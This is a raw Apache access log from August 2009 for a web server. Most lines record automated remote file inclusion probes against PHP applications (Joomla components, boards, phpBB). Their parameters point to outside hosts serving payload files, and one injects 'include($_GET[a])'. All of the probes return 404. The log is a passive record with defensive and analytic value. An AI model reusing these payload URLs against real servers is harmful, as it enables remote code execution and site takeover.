124.0.237.140 - - [02/Aug/2009:02:11:52 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
92.46.175.14 - - [02/Aug/2009:02:11:55 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
92.46.175.14 - - [02/Aug/2009:02:11:55 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:12:21 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:12:25 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:02:12:28 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:02:12:28 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
80.67.26.187 - - [02/Aug/2009:02:12:35 -0400] "GET /logs/access_log.Q109070300%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:02:12:42 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:02:12:42 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
80.67.26.187 - - [02/Aug/2009:02:12:56 -0400] "GET /logs/error_log.Q109070300%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.25.134.211 - - [02/Aug/2009:02:14:19 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
123.125.66.121 - - [02/Aug/2009:02:14:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [02/Aug/2009:02:14:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.192.37.223 - - [02/Aug/2009:02:15:07 -0400] "GET /logs/access_log.Q109072300%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:02:15:07 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.30.81.182 - - [02/Aug/2009:02:15:30 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.7.116 - - [02/Aug/2009:02:15:41 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
193.138.88.20 - - [02/Aug/2009:02:16:04 -0400] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 351 "-" "Mozilla/5.0"
193.138.88.20 - - [02/Aug/2009:02:16:04 -0400] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
193.138.88.20 - - [02/Aug/2009:02:16:04 -0400] "GET /logs/access_log.Q109070800/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 378 "-" "Mozilla/5.0"
193.138.88.20 - - [02/Aug/2009:02:17:01 -0400] "GET /logs/access_log.Q109070900/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 378 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:42 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:42 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:42 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:43 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.dolphinhelper.com/community//enda-id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:43 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.dolphinhelper.com/community//enda-id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:43 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.dolphinhelper.com/community//enda-id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:44 -0400] "GET /logs/access_log.Q109072300%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.dolphinhelper.com/community//enda-id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:02:17:46 -0400] "GET /logs/access_log.Q109072300//bbs//skin/ggambo7002_board/write.php?dir=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:19:38 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:19:38 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:19:39 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
71.128.200.166 - - [02/Aug/2009:02:19:49 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.128.200.166 - - [02/Aug/2009:02:19:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.128.200.166 - - [02/Aug/2009:02:19:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.128.200.166 - - [02/Aug/2009:02:19:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [02/Aug/2009:02:19:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.176.241.116 - - [02/Aug/2009:02:19:57 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
219.117.207.76 - - [02/Aug/2009:02:19:58 -0400] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:02:19:58 -0400] "GET /logs/access_log.Q109070800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 380 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:02:19:58 -0400] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 351 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:02:20:37 -0400] "GET /logs/access_log.Q109070800/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 378 "-" "Mozilla/5.0"
193.138.88.20 - - [02/Aug/2009:02:20:40 -0400] "GET /logs/access_log.Q109070800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 380 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:20:45 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:02:21:04 -0400] "GET /logs/access_log.Q109070900/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 378 "-" "Mozilla/5.0"
193.138.88.20 - - [02/Aug/2009:02:21:15 -0400] "GET /logs/error_log.Q109070800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 379 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:08 -0400] "GET /logs/access_log.Q109072700/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:08 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:08 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:08 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:09 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:09 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:09 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:09 -0400] "GET /logs/access_log.Q109072700%20%20/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:17 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:18 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:18 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:22 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:22 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:22 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:22 -0400] "GET /logs/access_log.Q109072700%20%20/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:29 -0400] "GET /logs/access_log.Q109072700/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:46 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:46 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:22:46 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:49 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:50 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:22:50 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.25.134.211 - - [02/Aug/2009:02:23:47 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
209.25.134.211 - - [02/Aug/2009:02:23:47 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
209.25.134.211 - - [02/Aug/2009:02:23:51 -0400] "GET /logs/access_log.Q109070100//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
217.199.222.19 - - [02/Aug/2009:02:25:48 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:25:56 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:25:56 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:25:56 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:02:25:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.147.72.145 - - [02/Aug/2009:02:26:01 -0400] "GET /logs/access_log.Q109072700/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:26:12 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:26:16 -0400] "GET /logs/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:26:16 -0400] "GET /config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:26:16 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.27 - - [02/Aug/2009:02:26:16 -0400] "GET /logs/access_log.Q109072700/config.php?path_to_root=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:26:21 -0400] "GET /config.php?path_to_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:26:21 -0400] "GET /logs/config.php?path_to_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:26:21 -0400] "GET /logs/access_log.Q109060300%20%20/config.php?path_to_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:26:25 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:26:39 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:26:43 -0400] "GET /logs/access_log.Q109062100/convert/mvcw.php?vwar_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:02:27:04 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:02:27:04 -0400] "GET /logs/access_log.Q109051200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:02:27:05 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:02:27:05 -0400] "GET /logs/access_log.Q109052900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:28:28 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:28:28 -0400] "GET /logs/access_log.Q109072700/config.php?path_to_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.238.14.146 - - [02/Aug/2009:02:29:13 -0400] "GET //banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.238.14.146 - - [02/Aug/2009:02:29:13 -0400] "GET /logs/access_log.Q109060400//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
211.238.14.146 - - [02/Aug/2009:02:29:14 -0400] "GET /logs//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
211.238.14.146 - - [02/Aug/2009:02:29:16 -0400] "GET //banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.238.14.146 - - [02/Aug/2009:02:29:16 -0400] "GET /logs/access_log.Q109060400//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
211.238.14.146 - - [02/Aug/2009:02:29:16 -0400] "GET /logs//banner.inc.php?INCLUDE_FOLDER=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
209.59.12.99 - - [02/Aug/2009:02:30:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.176.241.116 - - [02/Aug/2009:02:30:59 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
206.176.241.116 - - [02/Aug/2009:02:31:00 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
206.176.241.116 - - [02/Aug/2009:02:31:08 -0400] "GET /logs/access_log.Q109072300//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
61.114.35.0 - - [02/Aug/2009:02:31:18 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:31:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:31:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:31:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.0.237.140 - - [02/Aug/2009:02:31:36 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:31:36 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:31:36 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:31:51 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:31:51 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
